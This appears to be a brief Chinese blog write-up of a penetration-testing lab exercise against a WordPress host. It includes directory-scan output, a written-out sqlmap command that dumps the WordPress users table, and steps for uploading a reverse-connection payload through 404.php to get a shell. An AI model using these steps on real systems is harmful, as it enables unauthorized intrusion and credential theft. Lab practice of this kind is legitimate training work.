当前位置: 首页 > news >正文

磐云P10 P057-综合渗透测试-使用反弹木马进行提权获取主机Shell

news 2025/6/6 14:18:57

发现没有什么可以利用的服务,但是开了80、443,确定是一个网页,访问8080端口发现是一个WordPress构建的博客

+ /login.php: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found.

扫目录发现了两个登录页面,其中有WordPress的登录后台,用SQLmap爆

sqlmap -u http://172.16.1.107/login.php --batch --forms --level 5 -D 'wordpress8080' -T 'users' --dump

上传反向连接的载荷

注意上传的时候把脚本前的/*删除,访问404.php

拿到flag

http://www.xdnf.cn/news/870535.html

相关文章:

  • STM32学习之看门狗(理论篇)
  • 10.MySQL索引特性
  • dify中解决docx上传文件报错问题
  • 泰迪杯特等奖案例深度解析:基于量子启发优化与多尺度时空建模的港口物流智能调度系统
  • 如何应对敏捷转型中的团队阻力
  • 【位运算】丢失的数字(easy)
  • Linux进程调度:从时间片到实时任务的交响乐
  • C++——智能指针 unique_ptr
  • 【leetcode】9. 回文数
  • Hadoop大数据集群深度实践:源码分析、参数调优与自动化运维平台选型全解
  • 知识宇宙-学习篇:程序员调试思维
  • PyTest框架学习
  • docker镜像下载到本地,并导入服务器
  • spring4第6课-bean之间的关系+bean的作用范围
  • [C]extern声明变量报错:undefined reference终极解决方案
  • 《从零掌握MIPI CSI-2: 协议精解与FPGA摄像头开发实战》-- 第一篇:MIPI CSI-2基础入门
  • 【AAOS】【源码分析】用户管理(二)-- 用户启动
  • APx500录制波形
  • Qt Creator工具编译器配置
  • Oj系统测试报告
  • 第3章(新)Day3-Python逻辑语句
  • Java 创建线程池的几种方式
  • Python基础:文件简单操作
  • OpenCV CUDA模块图像处理------创建CUDA加速的Canny边缘检测器对象createCannyEdgeDetector()
  • 使用 useSearchParams 的一个没有触发控制台报错的错误用法
  • STL 库基础概念与示例
  • 洛谷每日1题-------Day39__P1697 [USACO18JAN] Lifeguards B
  • Vue 生命周期全解析:从创建到销毁的完整旅程
  • Redisson - 实现延迟队列
  • 通过ca证书的方式设置允许远程访问Docker服务